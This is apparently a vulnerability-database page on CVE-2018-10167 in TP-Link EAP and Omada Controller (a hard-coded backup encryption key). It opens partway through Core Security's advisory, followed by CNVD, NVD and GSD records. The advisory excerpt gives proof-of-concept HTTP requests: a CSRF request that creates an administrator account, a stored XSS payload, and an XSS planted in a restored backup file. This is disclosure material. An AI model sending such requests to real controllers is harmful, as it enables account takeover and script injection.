This\nwould allow an attacker to submit authenticated requests when an\nauthenticated user browses an attack-controlled domain. \n\nProof of concept to create an Administrator User\n\n/-----\nPOST /user/addUser HTTP/1.1\nHost: EAP_CONTROLER_IP:8043\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0)\nGecko/20100101 Firefox/57.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nReferer: http://127.0.0.1:5000/xss\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 64\nCookie: TPEAP_LANGUAGE=en;\nTPEAP_SESSIONID=80ab613a-590c-47ac-a2d6-f2949a0e9daa\nConnection: close\nUpgrade-Insecure-Requests: 1\n\nname=testuser\u0026email=testuser%40gmail.com\u0026roleId=59fb411ebb62eef169069ac3\u0026password=123456\u0026roleName=administrator\n-----/\n\n7.4. **Cross-Site Scripting in the creation of a local User**\n\n[CVE-2018-10165]\nThe following parameter of the local user creation is vulnerable to a\nstored Cross Site Scripting: userName\n     \nThe following is a proof of concept to demonstrate the vulnerability:\n     \n/-----\nPOST /hotspot/localUser/saveUser HTTP/1.1\nHost: EAP_CONTROLER_IP:8043\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0)\nGecko/20100101 Firefox/57.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nReferer: http://127.0.0.1:5000/xss\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 64\nCookie: TPEAP_LANGUAGE=en\nConnection: close\nUpgrade-Insecure-Requests: 1\n\nuserName=%3Cscript%3Ealert%281%29%3C%2Fscript%3E\u0026password=123456\n-----/\n\n7.5. **Cross-Site Scripting in portalPictureUpload**\n\n[CVE-2018-10164]\nThe implementation of portalPictureUpload can be abused and leads to a\nstored Cross Site Scripting. \n\nDecrypting the backup file shows that the portal background image is\nuploaded encoded in base64 and stored in the software database (mongoDB)\n\nIn the following example we encode \"\u003cscript\u003ealert(1)\u003c/script\u003e\" in base64,\nthe results is \"PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==\" so we replace the\nfileData with the code and restore the backup file. \n\n/-----\n\u003cpicturefiles\u003e\n\u003cfile\u003e\n  \u003cfileId\u003e5a383b962dc07622f0bdc101\u003c/fileId\u003e\n  \u003cfileData\u003ePHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==\u003c/fileData\u003e\n\u003c/file\u003e\n\u003c/picturefiles\u003e\n-----/\n\nTo execute the stored XSS we enter the page\nhttps://EAP_CONTROLER_IP:8043/globalsetting/portalPictureLoad?fileId=5a383b962dc07622f0bdc101\n(using the fileId used in the example). \n     \n8. **Report Timeline**\n2018-01-12: Core Security sent an initial notification to TP-LINK, asking\nfor GPG keys in order to send draft advisory. \n2018-01-14: TP-Link answered asking for the advisory in clear text. \n2018-01-15: Core Security sent the draft advisory to TP-Link in clear\ntext form. \n2018-01-29: TP-Link informed Core Security they checked the draft advisory\nand they are going to fix the vulnerabilities. \n2018-01-29: Core Security asked if all the reported vulnerabilities were\nconfirmed and request an estimated release date for the fix. \n2018-02-07: TP-Link informed that they were working in a beta version of\nthe fix and they will provide it to Core Security for test. \n2018-02-07: Core Security thanked TP-Link\u0027s answer and asked for a\ntentative date for this beta version. \n2018-02-19: Core Security tested the beta version and verified that all\nthe vulnerabilities were fixed. Also, Core Security asked for a tentative\nrelease date for the fix. \n2018-02-27: Core Security asked for a status update again. However, this version didn\u0027t address the\nreported vulnerabilities. Core Security asked for a status update again. \n2018-03-01: Core Security thanked TP-Link\u0027s answer and requested for a\nregular contact till the release of the fixed version. \n2018-03-19: Core Security requested a status update. \n2018-03-21: TP-Link confirmed that the new version will be available in\nearly April. \n2018-03-26: Core Security thanked TP-Link\u0027s reply an asked for a solidified\nrelease date. \n2018-04-13: Core Security noticed that a new version of the EAP Controller\nwas released (v2.6.1) and asked TP-Link if this version fixed the reported\nvulnerabilities. \n2018-04-16: Core Security tested the new release and confirmed that the\nreported vulnerabilities were addressed. \n2018-04-17: Core Security set release date to be May 3rd at 12 PM EST. \n     \n9. **References**\n\n[1] https://www.tp-link.com/en/products/details/EAP-Controller.html. \n[2]\nhttps://www.tp-link.com/en/download/EAP-Controller.html#Controller_Software. \n\n10. **About CoreLabs**\n\nCoreLabs, the research center of Core Security, is charged with anticipating\nthe future needs and requirements for information security technologies. \nWe conduct our research in several important areas of computer security\nincluding system vulnerabilities, cyber attack planning and simulation,\nsource code auditing, and cryptography. Our results include problem\nformalization, identification of vulnerabilities, novel solutions and\nprototypes for new technologies. CoreLabs regularly publishes security\nadvisories, technical papers, project information and shared software\ntools for public use at:\nhttp://corelabs.coresecurity.com. \n   \n11. **About Core Security**\n\nCore Security provides companies with the security insight they need to\nknow who, how, and what is vulnerable in their organization. The company\u0027s\nthreat-aware, identity \u0026 access, network security, and vulnerability\nmanagement solutions provide actionable insight and context needed to manage\nsecurity risks across the enterprise. This shared insight gives customers\na comprehensive view of their security posture to make better security\nremediation decisions. Better insight allows organizations to prioritize\ntheir efforts to protect critical assets, take action sooner to mitigate\naccess risk, and react faster if a breach does occur. \n\nCore Security is headquartered in the USA with offices and operations in\nSouth America, Europe, Middle East and Asia. To learn more, contact Core\nSecurity at (678) 304-4500 or info@coresecurity.com\n     \n12. **Disclaimer**\n\nThe contents of this advisory are copyright (c) 2018 Core Security and\n(c) 2018 CoreLabs, and are licensed under a Creative Commons Attribution\nNon-Commercial Share-Alike 3.0 (United States) License:\nhttp://creativecommons.org/licenses/by-nc-sa/3.0/us/\n\n13. **PGP/GPG Keys**\n\nThis advisory has been signed with the GPG key of Core Security advisories\nteam, which is available for download at\nhttp://www.coresecurity.com/files/attachments/core_security_advisories.asc",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2018-10167"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-004779"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2018-10974"
      },
      {
        "db": "BID",
        "id": "104094"
      },
      {
        "db": "VULHUB",
        "id": "VHN-119899"
      },
      {
        "db": "PACKETSTORM",
        "id": "147495"
      }
    ],
    "trust": 2.61
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2018-10167",
        "trust": 3.5
      },
      {
        "db": "BID",
        "id": "104094",
        "trust": 2.8
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-004779",
        "trust": 0.8
      },
      {
        "db": "CNVD",
        "id": "CNVD-2018-10974",
        "trust": 0.6
      },
      {
        "db": "NSFOCUS",
        "id": "39635",
        "trust": 0.6
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201805-142",
        "trust": 0.6
      },
      {
        "db": "VULHUB",
        "id": "VHN-119899",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "147495",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2018-10974"
      },
      {
        "db": "VULHUB",
        "id": "VHN-119899"
      },
      {
        "db": "BID",
        "id": "104094"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-004779"
      },
      {
        "db": "PACKETSTORM",
        "id": "147495"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201805-142"
      },
      {
        "db": "NVD",
        "id": "CVE-2018-10167"
      }
    ]
  },
  "id": "VAR-201805-0361",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2018-10974"
      },
      {
        "db": "VULHUB",
        "id": "VHN-119899"
      }
    ],
    "trust": 1.7
  },
  "iot_taxonomy": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "category": [
          "Network device"
        ],
        "sub_category": null,
        "trust": 0.6
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2018-10974"
      }
    ]
  },
  "last_update_date": "2024-11-23T22:06:50.632000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "Top Page",
        "trust": 0.8,
        "url": "https://www.tp-link.com/us/"
      },
      {
        "title": "Patch for TP-LinkEAPController and OmadaController hardcoded vulnerabilities",
        "trust": 0.6,
        "url": "https://www.cnvd.org.cn/patchInfo/show/131259"
      },
      {
        "title": "TP-Link EAP Controller  and Omada Controller Security vulnerabilities",
        "trust": 0.6,
        "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=79863"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2018-10974"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-004779"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201805-142"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-798",
        "trust": 1.9
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-119899"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-004779"
      },
      {
        "db": "NVD",
        "id": "CVE-2018-10167"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.9,
        "url": "https://www.coresecurity.com/advisories/tp-link-eap-controller-multiple-vulnerabilities"
      },
      {
        "trust": 2.5,
        "url": "http://www.securityfocus.com/bid/104094"
      },
      {
        "trust": 0.9,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-10167"
      },
      {
        "trust": 0.8,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-10167"
      },
      {
        "trust": 0.6,
        "url": "http://www.nsfocus.net/vulndb/39635"
      },
      {
        "trust": 0.3,
        "url": "http://www.tp-link.com/en/"
      },
      {
        "trust": 0.1,
        "url": "https://eap_controler_ip:8043/globalsetting/portalpictureload?fileid=5a383b962dc07622f0bdc101"
      },
      {
        "trust": 0.1,
        "url": "https://eap_controler_ip:8043/user/adduser\u0027,"
      },
      {
        "trust": 0.1,
        "url": "http://www.coresecurity.com/files/attachments/core_security_advisories.asc."
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-10166"
      },
      {
        "trust": 0.1,
        "url": "https://eap_controler_ip:8043/globalsetting/restore\u0027,"
      },
      {
        "trust": 0.1,
        "url": "https://eap_controler_ip:8043/globalsetting/backup\u0027,"
      },
      {
        "trust": 0.1,
        "url": "http://corelabs.coresecurity.com/"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-10168"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-10165"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-10164"
      },
      {
        "trust": 0.1,
        "url": "https://www.tp-link.com/en/products/details/eap-controller.html."
      },
      {
        "trust": 0.1,
        "url": "http://127.0.0.1:5000/xss"
      },
      {
        "trust": 0.1,
        "url": "http://corelabs.coresecurity.com."
      },
      {
        "trust": 0.1,
        "url": "https://www.tp-link.com/en/download/eap-controller.html#controller_software."
      },
      {
        "trust": 0.1,
        "url": "http://creativecommons.org/licenses/by-nc-sa/3.0/us/"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2018-10974"
      },
      {
        "db": "VULHUB",
        "id": "VHN-119899"
      },
      {
        "db": "BID",
        "id": "104094"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-004779"
      },
      {
        "db": "PACKETSTORM",
        "id": "147495"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201805-142"
      },
      {
        "db": "NVD",
        "id": "CVE-2018-10167"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "CNVD",
        "id": "CNVD-2018-10974"
      },
      {
        "db": "VULHUB",
        "id": "VHN-119899"
      },
      {
        "db": "BID",
        "id": "104094"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-004779"
      },
      {
        "db": "PACKETSTORM",
        "id": "147495"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201805-142"
      },
      {
        "db": "NVD",
        "id": "CVE-2018-10167"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2018-06-05T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2018-10974"
      },
      {
        "date": "2018-05-03T00:00:00",
        "db": "VULHUB",
        "id": "VHN-119899"
      },
      {
        "date": "2018-05-03T00:00:00",
        "db": "BID",
        "id": "104094"
      },
      {
        "date": "2018-06-27T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2018-004779"
      },
      {
        "date": "2018-05-04T01:20:40",
        "db": "PACKETSTORM",
        "id": "147495"
      },
      {
        "date": "2018-05-04T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201805-142"
      },
      {
        "date": "2018-05-03T18:29:00.420000",
        "db": "NVD",
        "id": "CVE-2018-10167"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2018-06-05T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2018-10974"
      },
      {
        "date": "2018-06-12T00:00:00",
        "db": "VULHUB",
        "id": "VHN-119899"
      },
      {
        "date": "2018-05-03T00:00:00",
        "db": "BID",
        "id": "104094"
      },
      {
        "date": "2018-06-27T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2018-004779"
      },
      {
        "date": "2018-05-04T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201805-142"
      },
      {
        "date": "2024-11-21T03:40:56.127000",
        "db": "NVD",
        "id": "CVE-2018-10167"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201805-142"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "TP-Link EAP Controller and  Omada Controller Vulnerabilities related to the use of hard-coded credentials",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-004779"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "lack of information",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201805-142"
      }
    ],
    "trust": 0.6
  }
}

CNVD-2018-10974

Vulnerability from cnvd - Published: 2018-06-05

Title

TP-Link EAP Controller和Omada Controller硬编码漏洞

Description

TP-Link EAP Controller和Omada Controller都是中国普联（TP-LINK）公司的用于远程控制无线AP接入点设备的软件。 TP-Link EAP Controller和Omada Controller 2.5.4_Windows版本和2.6.0_Windows版本中的Web应用程序备份文件存在安全漏洞，该漏洞源于程序使用硬编码加密密钥进行加密。攻击者可利用该漏洞解密并更改备份文件，从而提升权限。

Severity

高

Patch Name

TP-Link EAP Controller和Omada Controller硬编码漏洞的补丁

Patch Description

Formal description

目前厂商已发布升级补丁以修复漏洞，详情请关注厂商主页： https://www.tp-link.com/

Reference

https://www.securityfocus.com/bid/104094

Impacted products

Name
['TP-Link EAP Controller 2.5.4_Windows', 'TP-Link EAP Controller 2.6.0_Windows', 'TP-Link Omada Controller 2.5.4_Windows', 'TP-Link Omada Controller 2.6.0_Windows']

Show details on source website

JSON

To clipboard

{
  "cves": {
    "cve": {
      "cveNumber": "CVE-2018-10167",
      "cveUrl": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10167"
    }
  },
  "description": "TP-Link EAP Controller\u548cOmada Controller\u90fd\u662f\u4e2d\u56fd\u666e\u8054\uff08TP-LINK\uff09\u516c\u53f8\u7684\u7528\u4e8e\u8fdc\u7a0b\u63a7\u5236\u65e0\u7ebfAP\u63a5\u5165\u70b9\u8bbe\u5907\u7684\u8f6f\u4ef6\u3002\r\n\r\nTP-Link EAP Controller\u548cOmada Controller 2.5.4_Windows\u7248\u672c\u548c2.6.0_Windows\u7248\u672c\u4e2d\u7684Web\u5e94\u7528\u7a0b\u5e8f\u5907\u4efd\u6587\u4ef6\u5b58\u5728\u5b89\u5168\u6f0f\u6d1e\uff0c\u8be5\u6f0f\u6d1e\u6e90\u4e8e\u7a0b\u5e8f\u4f7f\u7528\u786c\u7f16\u7801\u52a0\u5bc6\u5bc6\u94a5\u8fdb\u884c\u52a0\u5bc6\u3002\u653b\u51fb\u8005\u53ef\u5229\u7528\u8be5\u6f0f\u6d1e\u89e3\u5bc6\u5e76\u66f4\u6539\u5907\u4efd\u6587\u4ef6\uff0c\u4ece\u800c\u63d0\u5347\u6743\u9650\u3002",
  "discovererName": "Julian Munoz from Core Security Exploits QA",
  "formalWay": "\u76ee\u524d\u5382\u5546\u5df2\u53d1\u5e03\u5347\u7ea7\u8865\u4e01\u4ee5\u4fee\u590d\u6f0f\u6d1e\uff0c\u8be6\u60c5\u8bf7\u5173\u6ce8\u5382\u5546\u4e3b\u9875\uff1a\r\nhttps://www.tp-link.com/",
  "isEvent": "\u901a\u7528\u8f6f\u786c\u4ef6\u6f0f\u6d1e",
  "number": "CNVD-2018-10974",
  "openTime": "2018-06-05",
  "patchDescription": "TP-Link EAP Controller\u548cOmada Controller\u90fd\u662f\u4e2d\u56fd\u666e\u8054\uff08TP-LINK\uff09\u516c\u53f8\u7684\u7528\u4e8e\u8fdc\u7a0b\u63a7\u5236\u65e0\u7ebfAP\u63a5\u5165\u70b9\u8bbe\u5907\u7684\u8f6f\u4ef6\u3002\r\n\r\nTP-Link EAP Controller\u548cOmada Controller 2.5.4_Windows\u7248\u672c\u548c2.6.0_Windows\u7248\u672c\u4e2d\u7684Web\u5e94\u7528\u7a0b\u5e8f\u5907\u4efd\u6587\u4ef6\u5b58\u5728\u5b89\u5168\u6f0f\u6d1e\uff0c\u8be5\u6f0f\u6d1e\u6e90\u4e8e\u7a0b\u5e8f\u4f7f\u7528\u786c\u7f16\u7801\u52a0\u5bc6\u5bc6\u94a5\u8fdb\u884c\u52a0\u5bc6\u3002\u653b\u51fb\u8005\u53ef\u5229\u7528\u8be5\u6f0f\u6d1e\u89e3\u5bc6\u5e76\u66f4\u6539\u5907\u4efd\u6587\u4ef6\uff0c\u4ece\u800c\u63d0\u5347\u6743\u9650\u3002\u76ee\u524d\uff0c\u4f9b\u5e94\u5546\u53d1\u5e03\u4e86\u5b89\u5168\u516c\u544a\u53ca\u76f8\u5173\u8865\u4e01\u4fe1\u606f\uff0c\u4fee\u590d\u4e86\u6b64\u6f0f\u6d1e\u3002",
  "patchName": "TP-Link EAP Controller\u548cOmada Controller\u786c\u7f16\u7801\u6f0f\u6d1e\u7684\u8865\u4e01",
  "products": {
    "product": [
      "TP-Link EAP Controller 2.5.4_Windows",
      "TP-Link EAP Controller 2.6.0_Windows",
      "TP-Link Omada Controller 2.5.4_Windows",
      "TP-Link Omada Controller 2.6.0_Windows"
    ]
  },
  "referenceLink": "https://www.securityfocus.com/bid/104094",
  "serverity": "\u9ad8",
  "submitTime": "2018-05-09",
  "title": "TP-Link EAP Controller\u548cOmada Controller\u786c\u7f16\u7801\u6f0f\u6d1e"
}

FKIE_CVE-2018-10167

Vulnerability from fkie_nvd - Published: 2018-05-03 18:29 - Updated: 2024-11-21 03:40

Severity ?

7.5 (High) - CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H

Summary

References

URL	Tags
cve@mitre.org	http://www.securityfocus.com/bid/104094	Third Party Advisory, VDB Entry
cve@mitre.org	https://www.coresecurity.com/advisories/tp-link-eap-controller-multiple-vulnerabilities	Exploit, Third Party Advisory
af854a3a-2127-422b-91ae-364da2661108	http://www.securityfocus.com/bid/104094	Third Party Advisory, VDB Entry
af854a3a-2127-422b-91ae-364da2661108	https://www.coresecurity.com/advisories/tp-link-eap-controller-multiple-vulnerabilities	Exploit, Third Party Advisory

Impacted products

	Vendor	Product	Version
	tp-link	eap_controller	2.5.4
	tp-link	eap_controller	2.6.0

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:tp-link:eap_controller:2.5.4:*:*:*:*:windows:*:*",
              "matchCriteriaId": "B122DC18-221C-4B02-9A62-0E0CCB17DC10",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:tp-link:eap_controller:2.6.0:*:*:*:*:windows:*:*",
              "matchCriteriaId": "C1615604-D1D3-48C1-AE3F-7E82156972A8",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "The web application backup file in the TP-Link EAP Controller and Omada Controller versions 2.5.4_Windows/2.6.0_Windows is encrypted with a hard-coded cryptographic key, so anyone who knows that key and the algorithm can decrypt it. A low-privilege user could decrypt and modify the backup file in order to elevate their privileges. This is fixed in version 2.6.1_Windows."
    },
    {
      "lang": "es",
      "value": "El archivo de copia de seguridad de la aplicaci\u00f3n web en TP-Link EAP Controller y Omada Controller en versiones 2.5.4_Windows/2.6.0_Windows est\u00e1 cifrado con una clave criptogr\u00e1fica embebida, por lo que cualquiera que conozca dicha clave y el algoritmo puede descifrarlo. Un usuario con pocos privilegios puede descifrar y modificar el archivo de copia de seguridad para elevar sus privilegios. Esto se ha solucionado en la versi\u00f3n 2.6.1_Windows."
    }
  ],
  "id": "CVE-2018-10167",
  "lastModified": "2024-11-21T03:40:56.127",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "MEDIUM",
        "cvssData": {
          "accessComplexity": "MEDIUM",
          "accessVector": "NETWORK",
          "authentication": "SINGLE",
          "availabilityImpact": "PARTIAL",
          "baseScore": 6.0,
          "confidentialityImpact": "PARTIAL",
          "integrityImpact": "PARTIAL",
          "vectorString": "AV:N/AC:M/Au:S/C:P/I:P/A:P",
          "version": "2.0"
        },
        "exploitabilityScore": 6.8,
        "impactScore": 6.4,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ],
    "cvssMetricV30": [
      {
        "cvssData": {
          "attackComplexity": "HIGH",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 7.5,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "LOW",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
          "version": "3.0"
        },
        "exploitabilityScore": 1.6,
        "impactScore": 5.9,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ]
  },
  "published": "2018-05-03T18:29:00.420",
  "references": [
    {
      "source": "cve@mitre.org",
      "tags": [
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "http://www.securityfocus.com/bid/104094"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Exploit",
        "Third Party Advisory"
      ],
      "url": "https://www.coresecurity.com/advisories/tp-link-eap-controller-multiple-vulnerabilities"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "http://www.securityfocus.com/bid/104094"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Exploit",
        "Third Party Advisory"
      ],
      "url": "https://www.coresecurity.com/advisories/tp-link-eap-controller-multiple-vulnerabilities"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-798"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

GSD-2018-10167

Vulnerability from gsd - Updated: 2023-12-13 01:22

Details

Aliases

CVE-2018-10167

Aliases

CVE-2018-10167

JSON

To clipboard

{
  "GSD": {
    "alias": "CVE-2018-10167",
    "description": "The web application backup file in the TP-Link EAP Controller and Omada Controller versions 2.5.4_Windows/2.6.0_Windows is encrypted with a hard-coded cryptographic key, so anyone who knows that key and the algorithm can decrypt it. A low-privilege user could decrypt and modify the backup file in order to elevate their privileges. This is fixed in version 2.6.1_Windows.",
    "id": "GSD-2018-10167",
    "references": [
      "https://packetstormsecurity.com/files/cve/CVE-2018-10167"
    ]
  },
  "gsd": {
    "metadata": {
      "exploitCode": "unknown",
      "remediation": "unknown",
      "reportConfidence": "confirmed",
      "type": "vulnerability"
    },
    "osvSchema": {
      "aliases": [
        "CVE-2018-10167"
      ],
      "details": "The web application backup file in the TP-Link EAP Controller and Omada Controller versions 2.5.4_Windows/2.6.0_Windows is encrypted with a hard-coded cryptographic key, so anyone who knows that key and the algorithm can decrypt it. A low-privilege user could decrypt and modify the backup file in order to elevate their privileges. This is fixed in version 2.6.1_Windows.",
      "id": "GSD-2018-10167",
      "modified": "2023-12-13T01:22:41.747427Z",
      "schema_version": "1.4.0"
    }
  },
  "namespaces": {
    "cve.org": {
      "CVE_data_meta": {
        "ASSIGNER": "cve@mitre.org",
        "ID": "CVE-2018-10167",
        "STATE": "PUBLIC"
      },
      "affects": {
        "vendor": {
          "vendor_data": [
            {
              "product": {
                "product_data": [
                  {
                    "product_name": "n/a",
                    "version": {
                      "version_data": [
                        {
                          "version_value": "n/a"
                        }
                      ]
                    }
                  }
                ]
              },
              "vendor_name": "n/a"
            }
          ]
        }
      },
      "data_format": "MITRE",
      "data_type": "CVE",
      "data_version": "4.0",
      "description": {
        "description_data": [
          {
            "lang": "eng",
            "value": "The web application backup file in the TP-Link EAP Controller and Omada Controller versions 2.5.4_Windows/2.6.0_Windows is encrypted with a hard-coded cryptographic key, so anyone who knows that key and the algorithm can decrypt it. A low-privilege user could decrypt and modify the backup file in order to elevate their privileges. This is fixed in version 2.6.1_Windows."
          }
        ]
      },
      "problemtype": {
        "problemtype_data": [
          {
            "description": [
              {
                "lang": "eng",
                "value": "n/a"
              }
            ]
          }
        ]
      },
      "references": {
        "reference_data": [
          {
            "name": "104094",
            "refsource": "BID",
            "url": "http://www.securityfocus.com/bid/104094"
          },
          {
            "name": "https://www.coresecurity.com/advisories/tp-link-eap-controller-multiple-vulnerabilities",
            "refsource": "MISC",
            "url": "https://www.coresecurity.com/advisories/tp-link-eap-controller-multiple-vulnerabilities"
          }
        ]
      }
    },
    "nvd.nist.gov": {
      "configurations": {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:tp-link:eap_controller:2.6.0:*:*:*:*:windows:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:tp-link:eap_controller:2.5.4:*:*:*:*:windows:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      },
      "cve": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2018-10167"
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "en",
              "value": "The web application backup file in the TP-Link EAP Controller and Omada Controller versions 2.5.4_Windows/2.6.0_Windows is encrypted with a hard-coded cryptographic key, so anyone who knows that key and the algorithm can decrypt it. A low-privilege user could decrypt and modify the backup file in order to elevate their privileges. This is fixed in version 2.6.1_Windows."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "en",
                  "value": "CWE-798"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://www.coresecurity.com/advisories/tp-link-eap-controller-multiple-vulnerabilities",
              "refsource": "MISC",
              "tags": [
                "Exploit",
